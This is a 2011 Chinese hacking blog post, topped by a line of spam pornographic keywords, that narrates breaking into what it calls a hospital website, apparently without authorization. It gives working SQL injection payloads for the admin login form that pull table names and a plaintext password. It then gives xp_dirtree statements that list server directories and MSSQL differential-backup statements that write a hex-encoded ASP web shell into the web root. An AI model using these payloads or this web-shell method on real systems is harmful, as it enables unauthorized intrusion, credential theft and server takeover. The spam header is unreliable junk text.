欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

后臺(tái)登入框注入拿shell步驟

  發(fā)布時(shí)間:2011-03-22 21:43:19   作者:佚名   我要評(píng)論
朋友突然丟來(lái)一個(gè)站,說(shuō)幫他日日站,前臺(tái)都沒(méi)有注入點(diǎn),上傳點(diǎn)也沒(méi)有,說(shuō)就后天有注入點(diǎn),可是他說(shuō)他手工功力不夠,讓俺來(lái)試試,于是,我就放下手中的活,打開(kāi)了網(wǎng)站。
打開(kāi)網(wǎng)站(網(wǎng)址就不發(fā)了,只講過(guò)程),是一個(gè)醫(yī)院的站點(diǎn),看了下網(wǎng)站程序,是asp的,嘻嘻,asp的站日的比較多,對(duì)它有點(diǎn)親切感,隨便點(diǎn)了一個(gè)新聞鏈接,加上一個(gè)單引號(hào),彈出了一個(gè)對(duì)話框


看來(lái)有點(diǎn)防范啊,為了確定是否是防注入系統(tǒng),如果是的話,我們就可以試試cookie注入了,于是,我換個(gè)方法檢測(cè)了下,就是
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65&MainBcgID=102-0
在數(shù)字后加上減0,回車(chē),彈出相同的提示對(duì)話框,分別提交
http://www.xxx.com/kssz.asp?BcgID=104&ThatBcgID=65-0&MainBcgID=102
http://www.xxx.com/kssz.asp?BcgID=104-0&ThatBcgID=65&MainBcgID=102
都是相同的提示,看來(lái)是程序過(guò)濾了,非防注入。
然后我就打開(kāi)Google,搜索了下帶有asp?id=的鏈接,結(jié)果都是一樣,那注入就沒(méi)戲了。
接下來(lái),俺就拿出自己寫(xiě)的掃描工具掃描了下常見(jiàn)上傳點(diǎn),也沒(méi)有發(fā)現(xiàn),看來(lái),只能向后臺(tái)輸入框進(jìn)軍了哈。
在后臺(tái)輸入一個(gè)單引號(hào),隨便輸入密碼,回車(chē),報(bào)錯(cuò)了,哈



看來(lái)朋友說(shuō)的沒(méi)錯(cuò),有戲啊,而且是mssql的,幸虧是mssql的,不然還拿不下呢(原因,后面會(huì)提到)
接著,按照常規(guī)步驟,開(kāi)始注入了,但是俺是懶人,想偷點(diǎn)懶,于是抓包,想通過(guò)get方式來(lái)注入,這樣可以讓工具來(lái)代替人力啊,哈哈,


于是,組合下內(nèi)容
www.xxx.com/login/default.asp?Submit=%B5%C7+%C2%BC&Userpwd=1& Username=1
可是老天就是不配合俺,這個(gè)方法在這里不行啊。哎,看來(lái)只能手工了,這個(gè)對(duì)俺來(lái)說(shuō)相當(dāng)痛苦了。
米辦法,老實(shí)的一步一步來(lái)了。在輸入框里輸入’ having 1=1 and ‘’=’ 回車(chē),報(bào)錯(cuò)



嘻嘻,我得意的笑,這里,我們得到了表名和字段名,繼續(xù)爆,輸入’group by user_info.user_id having 1=1 and ‘’=’


爆出了user_name,繼續(xù)爆,’group by user_info.user_id ,user_info.user_name having 1=1 and ‘’=’

到這里就差不多了,我們要的關(guān)鍵字段都有了,表名也有了,該是爆內(nèi)容了,輸入

’and 1=(select user_name from user_info) and ‘’=’ 爆出了用戶名

然后用相同方法,輸入’and 1=(select user_pwd from user_info) and ‘’=’ 爆出了密碼,哈哈發(fā)現(xiàn)密碼還是不加密的,那就更好了。
直接拿起密碼進(jìn)入后臺(tái)

以為接下來(lái)就容易拿到shell了,隨便找了一個(gè)上傳點(diǎn),試了下直接傳,提示成功,哈哈,開(kāi)心了,心道,今天rp不錯(cuò)的嘛,剛剛在手工那里費(fèi)了點(diǎn)時(shí)間,現(xiàn)在剛剛補(bǔ)回來(lái)了,直接拿到shell了,于是拿著地址去打開(kāi),結(jié)果,當(dāng)場(chǎng)吐血,為啥,因?yàn)樯蟼髀窂降奈募A不讓執(zhí)行腳本啊


心里大罵這個(gè)管理員,shit,shit,shit他JJ,讓老子白高興一場(chǎng)。找了下其他圖片的文件夾路徑,都是一樣,不讓執(zhí)行腳本。哎,蒼天那,大地啊,你怎么可以這樣對(duì)我啊。以為沒(méi)辦法那shell了,準(zhǔn)備放棄了,和朋友一說(shuō),他說(shuō),是不是可以在后臺(tái)進(jìn)行差異備份拿shell呢,我一聽(tīng),一拍大腿,對(duì)啊,MMB,我怎么沒(méi)想到,哎,居然把后臺(tái)的注入點(diǎn)是mssql這茬給忘了,鄙視下自己。
要差異備份首先要知道站點(diǎn),哎,俺最頭痛的手工又要開(kāi)始了,話說(shuō)到這里,插一句話,希望各位一定要好好學(xué)習(xí)sql哦,工具是死的,人是活的,手工厲害啊,雖然麻煩(觀眾:又開(kāi)始裝逼了,小心出門(mén)被雷劈啊…..我:哈哈,俺不怕,俺是絕緣體,沒(méi)事沒(méi)事…..忽然,天空一陣巨響,小影子被雷劈了。。。55555555,今天沒(méi)看黃歷啊)
開(kāi)始猜路徑了,過(guò)程是:建立一個(gè)表,通過(guò)xp_dirtree組件,把列出來(lái)的內(nèi)容插入臨時(shí)表,然后我們?cè)谝粋€(gè)一個(gè)把內(nèi)容從臨時(shí)表里讀出來(lái)。
首先,我們建立一個(gè)表,輸入’ create talbe tmp(id int identity(1,1),path varchar(255),depth int,isfile int ) and ‘’=’
然后,我們要確認(rèn)下我們的表是否建立成功了,不然如果不成功的話,我們后面做的都是無(wú)用功了,哈。輸入’ select * from tmp having 1=1 and ‘’=’,報(bào)錯(cuò)了,說(shuō)明建表成功


接下來(lái),就是插入內(nèi)容了
‘insert into tmp exec master.dbo.xp_dirtree ‘d:\’,1,1 and ‘’=’
接著,就可以列目錄了,輸入
‘ and 1=(select path from tmp where id=N) and ‘’=’ (N=1,2,3,4,5,……)
就列出了路徑

改變N的值就可以列出了,重復(fù)過(guò)程就不寫(xiě)了,最后知道路徑是D:\website\xxx.com\
接下來(lái)就是進(jìn)行差異備份了,在輸入框輸入一次輸入差異備份語(yǔ)句
'alter database hz3yy set RECOVERY FULL--
'Drop table [banlg];create table [dbo].[banlg] ([cmd] [image])--
'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737335393536 backup log @a to disk=@s with init--
'insert into banlg(cmd) values(0x3C256578656375746528726571756573742822636D64222929253E)--
'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C776562736974655C687A3379792E636F6D5C772E617370 backup log @a to disk=@s--
'Drop table [banlg]—

然后輸入網(wǎng)址,輸入http://www.xxx.com/ww.asp,熟悉的亂碼界面出現(xiàn)了,哈哈,然后就是傳shell了,圖就不截了,嘻嘻。

相關(guān)文章

最新評(píng)論